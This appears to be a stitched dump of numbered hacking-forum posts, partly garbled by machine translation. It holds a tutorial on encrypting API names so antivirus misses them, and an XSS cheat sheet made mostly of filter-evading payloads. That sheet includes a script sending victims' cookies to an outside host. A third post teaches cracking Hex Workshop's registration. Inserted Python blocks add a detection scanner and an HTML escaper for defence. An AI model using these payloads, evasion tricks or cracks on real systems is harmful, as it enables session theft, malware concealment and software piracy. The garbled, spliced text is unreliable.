    dll = LoadLibrary("user32.dll");
    MyMessageBox = (MessageBoxA_t) GetProcAddress(dll, func_crypted);
    MyMessageBox(0, "In working dude ;)", "yeaaah", MB_OK);
    system("PAUSE");
    return 0;
}
```

We declare "dll" and "MyMessageBox" for later use with LoadLibrary and GetProcAddress. Then we load user32.dll (because that is where our MessageBox is declared; you can look all of this up in the MSDN). Once we have "dll" where we want it, we pass it to GetProcAddress and tell it at the same time that the function to be loaded is in "func_crypted". You know that "NfttbhfCpyB" has become "MessageBoxA". So we are saying nothing more than: "Load the function MessageBoxA from user32.dll". Then we finally have everything we want in MyMessageBox! We can now call it just as we would have done with MessageBox (or MessageBoxA). Alright dudes? =) In the case of GetWindowsDirectory it was not much different, except that I had to load kernel32.dll instead of user32.dll :) So, now follows a chapter for all those interested in reverse engineering (i.e. cracking); everyone who isn't into this area, please skip it, it would probably just confuse you!

0x5 - Deeper insight

So, you leet crackers :P fire up your favourite disassembler (in my case OllyDBG). I will explain all the steps here with OllyDBG.
Compile this source:

```c
#include <stdio.h>
#include <windows.h>

int main()
{
    Sleep(1000);
    MessageBox(0, "test", "test", MB_OK);
    return 0;
}
```

It is useless, I know! But it is only for better understanding. As you can easily recognize, the program waits one second and then displays a MessageBox. We now load this program into Olly. Go into the CPU window (i.e. the state you see as soon as a program is loaded into Olly; to be safe, press the "C" at the top of the toolbar) and right-click. Now select "Search for -> All intermodular calls". Look as much as you like, there isn't really much to read. Best look at the area around the red line below. Here's what you will discover:

```
00401321 | CALL <JMP.&KERNEL32.Sleep>        | kernel32.Sleep
00401348 | CALL <JMP.&USER32.MessageBoxA>    | USER32.MessageBoxA
```

(The addresses may vary.) You can see that 2 functions are implemented (or rather: called). Once our Sleep, and once our MessageBox. An antivirus program can recognize that. With our encryption, however, you can't see it! Because at start time (or before) our program doesn't yet know that this is really a function name with its corresponding decrypt function! So, now compile our MessageBoxA example and load it into Olly. Again "Search for -> All intermodular calls" and you land back in the same window. Take another look around the red line, and you recognize your API calls! LoadLibraryA, GetProcAddress, system and a few others :) But hm, where is our MessageBoxA? It isn't there! Because our program doesn't know it at this time! We go back to the CPU window (click on the "C" in the menu), click once in the box at the lower left, then right-click and select "Search for -> binary string". First we select "Entire block", then jump into the ASCII field and type ...
------------------------- NfttbhfCpyB ------------------------- ... one. This is our Encrypted "MessageBoxA" if you should forget it. Olly And there was! You see, it was not detected a function call. Let's go a little further, it also means "insight". Thus we have a breakpoint on the string. Mark it, make a right click, go to "Point Break" and you see a small menu. We want to be a hardware breakpoint, but on "Access" or "Write"? If we make one in Access, then we would probably break if the string deciphered, and it is called (ie for GetProcAddress is used). Or we take "Write" and then immediately break when we start the string to decrypt. We take the latter;) And be a DWORD (for safety's sake). Once F9 and off you go! We break to: ------------------------- 0040131A A1 00304000 MOV EAX, DWORD PTR DS: [403000] 0040131F 8945 E8 MOV DWORD PTR SS: [EBP-18], EAX; <- HERE ------------------------- Hm, but what's in EAX? I can tell you! "7474664E" equivalent "ttfN" ie "Nftt" which means that the first 4 bytes from Crypteten string copied:) Now they are in EBP-18 is stored. That will be the "cache" or halt the "Endspeicher", where the decrypted "MessageBoxA" is stored. The whole Procedure with the copy line: ------------------------- 0040131A A1 00304000 MOV EAX, DWORD PTR DS: [403000] 0040131F 8945 E8 MOV DWORD PTR SS: [EBP-18], EAX; <- First copy 4 bytes 00401322 A1 04304000 MOV EAX, DWORD PTR DS: [403004] 00401327 8945 EC MOV DWORD PTR SS: [EBP-14], EAX; <- Next 4 bytes to copy 0040132A A1 08304000 MOV EAX, DWORD PTR DS: [403008] 0040132F 8945 F0 MOV DWORD PTR SS: [EBP-10], EAX; <- Next 4 bytes ... 00401332 8D45 E8 LEA EAX, DWORD PTR SS: [EBP-18] <- EAX is now in the address to string 00401335 890424 MOV DWORD PTR SS: [ESP], EAX; <- This is stored in ESP ------------------------- I wonder why the degree of the compiler has done so cumbersome, but maybe. Shortly hereafter follows a call! 
------------------------- 00401338 E8 EB000000 CALL 00401428; <- Decrypt ------------------------- As my comment has already promised, here is decrypted! So once we trace pure, so that our F7 key also something to do:) ------------------------- 00401435 8B45 08 / -> MOV EAX, DWORD PTR SS: [EBP +8]; <- In the string load EAX 00401438 890424 | MOV DWORD PTR SS: [ESP], EAX; <- In ESP secure 0040143B E8 F0050000 | CALL <JMP.&msvcrt.strlen>; <- investigating the length of the string 00401440 3945 FC | CMP DWORD PTR SS: [EBP-4], EAX; <- All characters by? 00401443 73 2C | JNB SHORT 00401471; <- Then times jumping out of the loop! 00401445 8B45 08 | MOV EAX, DWORD PTR SS: [EBP +8]; <- The addresses to the string in EAX 00401448 0345 FC | ADD EAX, DWORD PTR SS: [EBP-4] <- The current character ... 0040144B 0FBE00 | MOVSX EAX, BYTE PTR DS: [EAX] <- EAX copy in ... 0040144E 8945 F4 | MOV DWORD PTR SS: [EBP-C], EAX; <- In EBP-C store 00401451 8D45 F4 | LEA EAX, DWORD PTR SS: [EBP-C] <- EAX In the address at the current character 00401454 FF08 | DEC DWORD PTR DS: [EAX] <- HERE! EAX decrease by one 00401456 8B45 F4 | MOV EAX, DWORD PTR SS: [EBP-C] <- EAX in the decoded symbol FB 00401459 8845 | MOV BYTE PTR SS: [EBP-5], AL; <- EBP-5 In the latest sign store 0040145C 8B45 08 | MOV EAX, DWORD PTR SS: [EBP +8] <- EAX has the address again to normal string 0040145F 8B55 FC | MOV EDX, DWORD PTR SS: [EBP-4] <- EDX is 0 00401462 01C2 | ADD EDX, EAX; <- EAX add EDX On 00401464 0FB645 FB | MOVZX EAX, BYTE PTR SS: [EBP-5] <- EAX is back in the decoded symbol 00401468 8802 | MOV BYTE PTR DS: [EDX], AL; <- Decrypts characters in the string will be changed 0040146A 8D45 FC | LEA EAX, DWORD PTR SS: [EBP-4]; <- Will increased (=> next character) 0040146D FF00 | INC DWORD PTR DS: [EAX] <- and hingeschrieben 0040146F EB ^ C4 \ - JMP SHORT 00401435; <- back to the beginning of loop ------------------------- Oh man! So much to read and understand! 
The comments should enhance the adventure, however;) In brief: All characters by one humiliate! Even shorter: Decrypt! But it is always nice to see what the compiler of our beautiful C code does not it? =) So, now we are setting a breakpoint after the JMP, allow the program to break, and now have our unencrypted "MessageBoxA" in memory lying ===) You do not believe me? Power for a short GOTO 0022FF60, owned, and the sight of you! : P Next in the code. So that our F8 key not schimmelt tippseln we bit on it since, so we also come with back out from the CALL. And we see what is exciting! Traced as little down time, after the Line with "% s", we see a "user32.dll", which looks very nice! And then there is a CALL to LoadLibraryA, and a little bit below make a GetProcAddress. Uhh have you also this tingling in the abdomen when everything is running perfectly? We turn times a breakpoint at the call to GetProcAddress because I have what you want to show! If Olly breaked look her in the stack. ------------------------- 0022FF20 7E360000 | 7E360000 = hModule (user32) 0022FF24 0022FF60 \ ProcNameOrOrdinal = "MessageBoxA" ------------------------- Just so much information at once! : O We recognize this HMODULE our of our code (as hex value in its natural form), and at the same time we recognize that we in the user32 and after "MessageBoxA". We step through this short time and then see CALL EAX into a miracle, our MessageBox was loaded! For me it is "7E3A058A," and when I look in the user32.dll would => It would agree;) You can convince yourself, right click the CPU window, "View -> Modules' user32 '' and now Right click "Goto -> Expression", the address, and schwupps, but it looks very much like a clean function, huh? OK, I think we have enough to getraced code, we have probably learned more (or not) as the Tutorial should provide. 
I hope part of you has fallen, if you've read through it ^ ^ _________________________ \ / \ / \ / \ / \ / 0x6 \ / \ / \ / \ / \ / \ / ######################### # Degree / Links # ######################### Pffft, then again from me:) The paper is unfortunately not as long as I have, I had hoped: / But I hope at least one which has learned from this tutorial:) This paper is released under the GNU Free Documentation License has been published So it is allowed to modify and distribute as you like, as long as my name on it still stands. Oh you know what, you can even get my name clear because the main people learn xD from this paper, so gehts doch;) So, as a sort of "annex" I have my whole source code here reinkopiert, have fun order, and to read again:) cryptme.c ------------------------- # include <stdio.h> # include <windows.h> int main (int argc, char * argv []) ( char hello [] = "Hello World"; crypt (& hello); printf ( "% s \ n", hello); system ( "PAUSE"); return 0; ) int crypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord + 1; chr = (char) ord; str [length] = chr; ) return 0; ) int decrypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord - 1; chr = (char) ord; str [length] = chr; ) return 0; ) ------------------------- mymessagebox.c ------------------------- # include <stdio.h> # include <windows.h> int main (int argc, char * argv []) ( func_crypted char [] = "NfttbhfCpyB"; HMODULE dll; FARPROC MyMessageBox; decrypt (& func_crypted); dll = LoadLibrary ( "user32.dll"); MyMessageBox = GetProcAddress (dll, func_crypted); MyMessageBox (0, "In working dude;)", "yeaaah", MB_OK); system ( "PAUSE"); return 0; ) int crypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord + 1; chr = (char) ord; str [length] = chr; ) 
return 0; ) int decrypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord - 1; chr = (char) ord; str [length] = chr; ) return 0; ) -------------------------
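A detection-side counterpart to the tutorial above, added here as an example and not part of the original post: a small Python scanner that pulls printable strings out of a byte blob and checks whether undoing a small character shift (the +1 used to turn "MessageBoxA" into "NfttbhfCpyB") yields a known API name. The API list and the sample data section are constructed for this example.

```python
"""Spot Caesar-shifted Windows API names (like "NfttbhfCpyB") in a binary blob."""
import re

# Subset of API names a scanner would care about (constructed list, extend as needed).
KNOWN_APIS = {
    "MessageBoxA", "GetWindowsDirectoryA", "LoadLibraryA", "GetProcAddress",
    "CreateFileA", "WriteFile", "VirtualAlloc", "WinExec", "URLDownloadToFileA",
}

# Printable, non-space runs of at least 6 bytes. The shift can turn letters into
# punctuation (e.g. 'z' + 1 = '{'), so the class is wider than [A-Za-z0-9].
STRING_RE = re.compile(rb"[\x21-\x7e]{6,}")


def shift_string(s: str, delta: int) -> str:
    """Apply the tutorial's crypt()/decrypt(): add delta to every character."""
    return "".join(chr((ord(c) + delta) & 0xFF) for c in s)


def extract_strings(blob: bytes):
    """Yield (offset, text) for every printable run in the blob."""
    for m in STRING_RE.finditer(blob):
        yield m.start(), m.group().decode("ascii")


def find_shifted_api_names(blob: bytes, max_shift: int = 3):
    """Return hits where undoing a small shift reveals a known API name.

    Plain (unshifted) names are left to the import table / plain string scan,
    so delta 0 is skipped. Each hit records offset, raw string, shift and name."""
    hits = []
    for offset, text in extract_strings(blob):
        for delta in range(-max_shift, max_shift + 1):
            if delta == 0:
                continue
            candidate = shift_string(text, delta)
            for api in KNOWN_APIS:
                if api in candidate:
                    hits.append({"offset": offset, "raw": text,
                                 "shift": delta, "api": api})
    return hits


# Constructed stand-in for the .data section of the tutorial's mymessagebox.exe:
# the two shifted names plus the plain strings such a program also carries.
SAMPLE_DATA = (
    b"\x00\x00NfttbhfCpyB\x00user32.dll\x00In working dude;)\x00yeaaah\x00"
    b"PAUSE\x00HfuXjoepxtEjsfdupszB\x00kernel32.dll\x00GetProcAddress\x00"
)

if __name__ == "__main__":
    for hit in find_shifted_api_names(SAMPLE_DATA):
        print(f"0x{hit['offset']:04x} {hit['raw']!r} shift {hit['shift']:+d} -> {hit['api']}")
```

The same idea generalises to any single-byte shift or XOR key: try the few plausible transformations on every string and compare against the name list.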
  11. Microsoft plans to release three patches tomorrow
by Alex Hanea | 9 March 2009
The company announced on Friday that on 10 March it will make available three security updates, one of which is considered critical, for Windows 2000, Server 2003, XP, Server 2008 and Windows Vista. One of the patches is classified by Microsoft as alert level four, namely "critical". If this "critical" problem is exploited, it can allow attackers to take control of computers without users lifting a finger. The other two patches are classified as "important", i.e. risk level three; they fix holes used by attackers to trick users into disclosing confidential information. Although the company did not disclose details about the vulnerabilities covered by the patches to be released tomorrow, Microsoft did acknowledge that these "critical" problems pose a risk to all versions of Windows released so far, while one of the patches considered "important" does not affect the XP or Vista operating systems. The update comes less than a week after Microsoft referred to a patch for a "critical" vulnerability similar to the one fixed by tomorrow's patch, but that time in Excel. Office and other Microsoft products will not be "affected" by this operation launched by the American company.
  12. Very old, but it works on many servers
  13. Code::Blocks - The IDE with all the features you need, having a consistent look, feel and operation across platforms.

The open source, cross platform, free C++ IDE. Code::Blocks is a free C++ IDE built to meet the most demanding needs of its users. It is designed to be very extensible and fully configurable. Finally, an IDE with all the features you need, having a consistent look, feel and operation across platforms. Built around a plugin framework, Code::Blocks can be extended with plugins. Any kind of functionality can be added by installing/coding a plugin. For instance, compiling and debugging functionality is already provided by plugins! We hope you enjoy using Code::Blocks!

Highlights:
- Open Source! GPLv3, no hidden costs.
- Cross-platform. Runs on Linux, Mac, Windows (uses wxWidgets).
- Written in C++. No interpreted languages or proprietary libs needed.
- Extensible through plugins

Compiler:
- Multiple compiler support: GCC (MingW / GNU GCC), MSVC++, Digital Mars, Borland C++ 5.5, Open Watcom ...and more
- Very fast custom build system (no makefiles needed)
- Support for parallel builds (utilizing your CPU's extra cores)
- Multi-target projects
- Workspaces to combine multiple projects
- Inter-project dependencies inside workspace
- Imports MSVC projects and workspaces (NOTE: assembly code not supported yet)
- Imports Dev-C++ projects

Debugger:
- Interfaces GNU GDB
- Also supports MS CDB (not fully featured)
- Full breakpoints support: code breakpoints; data breakpoints (read, write and read/write); breakpoint conditions (break only when an expression is true); breakpoint ignore counts (break only after certain number of hits)
- Display local function symbols and arguments
- User-defined watches (support for watching user-defined types through scripting)
- Call stack
- Disassembly
- Custom memory dump
- Switch between threads
- View CPU registers

Interface:
- Syntax highlighting, customizable and extensible
- Code folding for C++ and XML files
- Tabbed interface
- Code completion
- Class Browser
- Smart indent
- One-key swap between .h and .c/.cpp files
- Open files list for quick switching between files (optional)
- External customizable "Tools"
- To-do list management with different users

Download:
codeblocks-8.02-setup.exe
codeblocks-8.02mingw-setup.exe
NOTE: The codeblocks-8.02mingw-setup.exe file includes the GCC compiler and GDB debugger from MinGW.
Linux 32-bit:
Ubuntu: http://prdownload.berlios.de/codeblocks/codeblocks_8.02-0ubuntu1.deb.tar.gz
Debian: http://prdownload.berlios.de/codeblocks/codeblocks-8.02debian-i386.tar.gz
Mac OS X: http://prdownload.berlios.de/codeblocks/codeblocks-8.02-mac.zip
  14. Were the coins 5 bani or 50 bani? And how big were the screws? More likely washers. And it is possible for a screw or a washer to cost more than 50 bani. Interesting.
  15. I'm curious how many would sell things of their own, at least stolen by themselves. I think it would be 90% leeching. I don't agree with fraud. You sell something stolen, usually for something else stolen... Interesting.
  16. Nytro

    Where is the token?

    An <input type="hidden" name="security-token" value="plm" /> is missing
  17. Whoever keeps reviving topics from the Paleozoic (i.e. old ones) gets a warning.
  18. Cross Site Scripting exists because of the lack of filtering of user input in website forms.

Hackers' Evil Link
[example 1] <a href="[http://<XSS-host]/xssfile?evil request">Free Laptop!</a>
[example 2] <iframe src="[http://<XSS-host]/xssfile?evil request">Free Laptop!</iframe>
[example 3] <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://www.Site.com/xss.js"></SCRIPT>

XSS Cookie theft JavaScript
http://host/a.php?variable="><script>document.location='http://www.mysite.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>

Modifying Cookies
[example 1] <script>javascript:void(document.cookie="username=Admin")</script>

How to Search for Vulnerable Hosts
[example 1] [host]/<script>alert("XSS")</script>
[example 2] [host]/<script>alert('XSS')</script>/
[example 3] [host]/<script>alert('XSS')</script>.
[example 4] [host]/<script>alert('XSS')</script>
[example 5] [host]/\<script\>alert(\'XSS\')\<\/script\>
[example 6] [host]/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl
[example 7] [host]/\<sCRIPT>alert("d")</sCRIPT>\
[example 8] [host]/<\73CRIP\T>alert("dsf")<\/\73CRIP\T>
[example 9] [host]/<\73CRIP\T>alert('dsf')<\/\73CRIP\T>
[example 10] [host]/</sCRIP/T>alert("dsf")<///sCRIP/T>
[example 11] [host]/</sCRIP/T>alert('dsf')<///sCRIP/T>

[example 1] <script>javascript:alert(document.cookie)</script>
[example 2] <script>javascript:alert("XSS")</script>
[example 3] "<script>alert()</script>"This Site is not Secure!

- Also use a "?" request after the host.
[example 1] [host]/?<script>alert('XSS')</script>

WebServers XSS
Many webservers have default pages for folders that will look for a file.
[example 1] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".bas
[example 2] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".asp
[example 3] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".jsp
[example 4] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".htm
[example 5] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".html
[example 6] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".[ext]

A common place for an XSS hole is inside a server's default example files, such as:
[example 1] [host]/cgi/example?test=<script>alert('xss')</script>

The most common places to find XSS are the search files of servers.
[example 1] [host]/search.php?searchstring=<script>alert('XSS')</script>
[example 2] [host]/search.php?searchstring="><script>alert('XSS')</script>
[example 3] [host]/search.php?searchstring='><script>alert('XSS')</script>

Social Engineering XSS
Using the encoded characters instead may fool the filters and allow XSS to work.
[example 1] [host]/%3cscript%3ealert('XSS')%3c/script%3e
[example 2] [host]/%3c%53cript%3ealert('XSS')%3c/%53cript%3e
[example 3] [host]/%3c%53cript%3ealert('XSS')%3c%2f%53cript%3e
[example 4] [host]/%3cscript%3ealert('XSS')%3c/script%3e
[example 5] [host]/%3cscript%3ealert('XSS')%3c%2fscript%3e
[example 6] [host]/%3cscript%3ealert(%27XSS%27)%3c%2fscript%3e
[example 7] [host]/%3cscript%3ealert(%27XSS%27)%3c/script%3e
[example 8] [host]/%3cscript%3ealert("XSS")%3c/script%3e
[example 9] [host]/%3c%53cript%3ealert("XSS")%3c/%53cript%3e
[example 10] [host]/%3c%53cript%3ealert("XSS")%3c%2f%53cript%3e
[example 11] [host]/%3cscript%3ealert("XSS")%3c/script%3e
[example 12] [host]/%3cscript%3ealert("XSS")%3c%2fscript%3e
[example 13] [host]/%3cscript%3ealert(%34XSS%34)%3c%2fscript%3e
[example 14] [host]/%3cscript%3ealert(%34XSS%34)%3c/script%3e

- Also use a "?" request after the host.
[example 1] [host]/?%3cscript%3ealert('XSS')%3c/script%3e

100% encoded
[example 1] [host]/?%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
[example 2] [host]/?%27%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
[example 3] [host]/%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

Another form of encoding is: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
< is encoded as: &lt;
> is encoded as: &gt;
[example 1] %3Cscript%3Ealert(%22XSS%22)%3C/script%3E
[example 2] <script>alert("XSS")</script>
[example 3] <script>alert("XSS")</script>
[example 4] <script>alert(%34XSS%34)</script>
[example 5] <script>alert('XSS')</script>

[example 1] www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Any of the XSS requests presented above could be used on any asp, cfm, jsp, cgi, php or any other active html file.
[example 1] [host]/forum/post.asp?<script>alert('XSS')</script>
[example 2] [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e
[example 3] [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e
[example 4] [host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e
[example 5] [host]/forum/post.asp?<script>alert("XSS")</script>

Finding errors, such as by inputting a string instead of a number, or "\" or "/" instead of a string, or a very long string or a very large number: all these malformed parameters can help us find the place to inject XSS script.

Tag Closer
The "Tag Closer" method is used by inputting non-alphabetic and non-numeric chars inside a form's input text boxes. These chars could be: \,/,~,!,#,$,%,^,&,-,[,],null(char 255),.(dot) But the chars that mostly do the job are either " or '. What we do is just insert "> or '> inside a text box instead of our name/email/username/password etc...
[example 1] [host]/admin/login.asp?username="><script>alert('XSS')</script>&password=1234
[example 2] [host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script>
[example 3] [host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea>--><script>alert('XSS')</script>
[example 4] [host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script>

[example 1] [host]/admin/login.asp?username='><script>alert('XSS')</script>&password=1234
[example 2] [host]/admin/login.asp?username=admin&password='><script>alert('XSS')</script>
[example 3] [host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~'></textarea>--><script>alert('XSS')</script>
[example 4] [host]/search.php?action=soundex&firstname='><script>alert(document.cookie)</script>

This mainly works on the server's root:
[example 1] [host]/?"><script>alert('XSS')</script>
[example 2] [host]/?'><script>alert('XSS')</script>
[example 3] [host]/?--><script>alert('XSS')</script>

About <plaintext>
Another trick for exploiting an XSS was found by putting a <plaintext> tag after the xss code. Sometimes that makes it easier to exploit.
[example 1] [host]/?"><script>alert('XSS')</script><plaintext>
[example 2] [host]/?'><script>alert('XSS')</script><plaintext>
[example 3] [host]/admin/login.asp?username="><script>alert('XSS')</script><plaintext>&password=1234
[example 4] [host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script><plaintext>
[example 5] [host]/forum/post.asp?<script>alert('XSS')</script><plaintext>
[example 6] [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e<plaintext>
[example 7] [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e<plaintext>
[example 8] [host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e<plaintext>
[example 9] [host]/forum/post.asp?<script>alert("XSS")</script><plaintext>
[example 10] [host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script><plaintext>

[example 1] www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cplaintext%3E

Simple codes, just in case some of them do not seem to work:
</title><script>alert("XSS");</script><title><plaintext>
<script>alert(document.cookie)</script><plaintext>

Security Conclusion
[Replace]
< with &lt;
> with &gt;
& with &amp;
" with &quot;

[Possible XSS]
<applet> <frameset> <layer> <body> <html> <ilayer> <embed> <iframe> <meta> <frame> <img> <object> <script> <style>
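The "Security Conclusion" replacement table above, worked out in Python as an added example (not part of the original post): an output encoder that applies the replacements in the right order, the double-encoding mistake of handling "&" last, and the search-page pattern from the sheet rendered with the encoder applied. Function names and the page template are assumptions made for this example.

```python
"""Output encoding for HTML: the fix the XSS sheet's "Security Conclusion" lists."""
from urllib.parse import unquote

# The sheet's replacement table. Order matters: '&' must be handled first,
# otherwise the '&' inside the entities produced by the later rules is encoded again.
HTML_REPLACEMENTS = [
    ("&", "&amp;"),
    ("<", "&lt;"),
    (">", "&gt;"),
    ('"', "&quot;"),
    ("'", "&#x27;"),  # not in the sheet's table; needed against the '> style payloads
]


def escape_html(text: str) -> str:
    """Make untrusted text inert inside HTML text and quoted attribute values."""
    for raw, entity in HTML_REPLACEMENTS:
        text = text.replace(raw, entity)
    return text


def escape_html_wrong_order(text: str) -> str:
    """Same table with '&' applied last: demonstrates the double-encoding bug."""
    for raw, entity in reversed(HTML_REPLACEMENTS):
        text = text.replace(raw, entity)
    return text


def render_search_page(raw_query: str) -> str:
    """The search.php pattern from the sheet: the query is reflected twice.

    raw_query is the value as it arrives in the URL. The server decodes the %xx
    encoding before the application sees it, so the encoded variants in the sheet
    reach the template as plain '<script>' and are neutralised by escape_html."""
    query = unquote(raw_query)
    safe = escape_html(query)
    return (f'<p>Results for <b>{safe}</b></p>\n'
            f'<input type="text" name="searchstring" value="{safe}">')


def has_live_markup(html: str) -> bool:
    """Crude check used below: did a tag or an attribute-breaking sequence survive?"""
    lowered = html.lower()
    return "<script" in lowered or '"><' in lowered or "'><" in lowered


if __name__ == "__main__":
    print(render_search_page("%3cscript%3ealert(%27XSS%27)%3c/script%3e"))
    print(escape_html_wrong_order("<"))  # '&amp;lt;' instead of '&lt;'
```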
  19. I have been cracking sixth months ago and everything is good till now so I managed to share my knowledge with you. Note: if some links didn't work try googling the tool or the program, sorry for the inconvenience. The first thing I think you should do is get "W32Dasm". This is one of the tools you will use regularly when cracking. It is a "disassembler". It disassembles files, so you can see how the program is set out, how it works etc. Get this tool from :- http://www.woodmann.com/crackz/Tools.htm Just copy and paste that URL into your browser and you should start downloading. Go get this program now, and resume the tutorial when it's installed. When you disassemble a file for the first time, you'll look at the contents of your screen and think, "Oh dear...". Don't be discouraged, what you'll be looking at is the program's "Assembly". You will have to get to know what lots of the stuff means. I'm still struggling, but I'm still learning. The assembly of a program is the listing of all the functions it carries out. Every program you disassemble will look similar. When you disassemble a program using W32Dasm you will notice it takes a long time to load some files, depending on the size of the exe you are disassembling. (Especially on my slow excuse for a PC!) Load "calc.exe" (The Windows Calculator) into the disassembler. The one I have is 92KB, but if yours is different, just apply what I say to your version. (P.S. If you skipped ahead without getting W32Dasm, get it now, you honestly will need it from this point on). Disassembled the calculator? Good. Now, a few basics about the disassembled text. First of all, click on the button on the W32Dasm toolbar that says "Cd Loc". (When you put your mouse over this button it will say "Goto Code Location". Push the button. A window will pop up). Type in the window :- "010026A6" (Without Quotes) (Don't worry, it's only a random number I have chosen). Click on OK. 
All the way down the left side of the page you will see 8 numbers (or letters). These first 8 numbers or letters on each line are the "Addresses" or "Code Locations". Ignore the numbers and letters after the addresses for now. Addresses are used so that if a program says "Carry out the function at address (Whatever the address is)", the program will know where to go next. Things like that. Look at the right hand side of the assembly language. You will see something like the following: (Don't worry if yours isn't the same as what is written here - it's not important). call 01007387 mov ecx, dword ptr [01013D90] mov dword ptr [ecx+04], eax mov eax, dword ptr [01013D64] mov eax, dword ptr [4*eax+01013CE0] jmp 01002745 These are the actual instructions. Don't ask me what it all means! I only know the basics right now. Look for an instruction that begins with a "Jmp". Any one you can find. If you're using the same file as me, there will be one just below where your blue bar should be :- :010026AD E993000000 jmp 01002745 ^ ^ ^ Address "Hex" Instruction Don't worry yourself with hex just yet. See the "Jmp" is followed by an address. Here is a good place to explain that "Jmp" means "Jump". This means that the program will jump from the address specified on the left (e.g. in the above example the address is 010026AD) to the address specified in the Jump instruction (e.g. 01002745). Double-Click on the line with the "Jmp". The blue bar should go onto the line and turn green. Memorize the address after the "Jmp" (E.g. in the above example I mean memorize "01002745"). Look at the toolbar of W32Dasm. You will see a "Jump to" button. Put your mouse over it. It will say, "Execute Jump". Click on the button. Look at where it has taken you. Look on the left, the address is the one specified in the Jump instruction. Go to any random parts in the file and try this jumping procedure some more, so you get used to how jumping and addresses work. Now I'll explain about different jumps. 
The "Jmp" was an "Unconditional Jump". This means that the program will jump when it reaches the "Jmp" instruction, no questions asked. There are many other types of jump. Here are some of the most important: "Je" - Jump if Equal This will regularly come after a "Cmp" (Compare) instruction. You will see the compare instruction as "Cmp" followed by two values. e.g. Scroll up to address "010025C2" if you are using the same version of calc as me, otherwise, just follow what I'm saying. You'll find loads of "Cmp" instructions in your file also. :010025C2 3BC3 cmp eax, ebx :010025C4 0F84DD020000 je 010028A7 This is a typical example of a "Cmp" instruction followed by a "Je". In this example, when the program gets to this point, it will compare the value contained in ebx with the value contained in eax. (EAX and EBX are "Registers". Don't worry about it quite yet!) If the values in these registers are equal, the program will jump when it reaches the next (Je) instruction. If EAX and EBX's value are not equal, the program will not jump, the instruction will be ignored. "Jne" - Jump if NOT Equal This is the same sort of thing as "Je", but it's the opposite. It jumps if the compared values are not equal. It would be common to find a "Jne" in a relevant part of code in a program you are cracking, where if the program compares the registration code you entered with the right code, and they don't match, it will jump to a set of instructions that send you the error message. "Jz" - Jump if Zero This is like "Je" but it is after the program calculates something. If the answer to the calculation is 0 (Zero), the jump will occur. "Jnz" means Jump if NOT Equal. (Use your common sense). I will explain more about these jumps when I try to explain "SoftICE" to you. There are other jumps, but they don't need explaining now. Without any further ado, let's do some practical work... 
You will need two programs :- "Hex Workshop" (Version 2.20) (Which we will be cracking) and "Hackers' View" (or "HIEW" for short. This is a tool you will need to start using). Get these programs. http://ftp.bspu.unibel.by/fileecho/MFEDOS/HIEW616.ZIP (Hackers' View - copy and paste the URL and you should start downloading). http://www.bpsoft.com (Hex Workshop) Some of the links may be dead by the time you get to read this, if that's the case, just find a cracker, they should help you get the tools. (Or you could E-Mail me at "Florestan5@hotmail.com" and I'll send them by mail. Got the programs? Good. All set up? Run Hex Workshop. (HWorks32.exe). Aha, look in the top right hand corner. "Unregistered Version". We don't like that... Go to "Help", and "About". Here you have the chance to enter the serial number. Enter anything and click on "Register". Unless you are the luckiest person on earth and guessed the correct code, you will be staring at an error message. Write the message down. ("You have entered an invalid registration number" will suffice). Get out of the program. Highlight the HWorks32.exe file and copy it. (Ctrl-C, as if you didn't know). Make 2 copies of the file. Rename one "HWorks32.ex_" for backup, if we totally screw the program up when we're cracking it. Rename the other one "HWorks32.w32". This helps you remember that this is the file you will disassemble using (.w32)Dasm. Load up "HWorks32.w32" into W32Dasm. Click on find on the W32Dasm toolbar. Get the message you wrote down. Type in "You have entered an invalid". Click on find. It will put you in the section headed "Dialog Information", before you even come to any instructions or addresses. Look up 2 lines. You will see "DialogID_0075". Write this information down, as this is what the program will refer to when it needs the text for the error message. Click on find again. Enter "DialogID_0075" and click on find. You will land on a line that says "Possible reference to Dialog: DialogID_0075". 
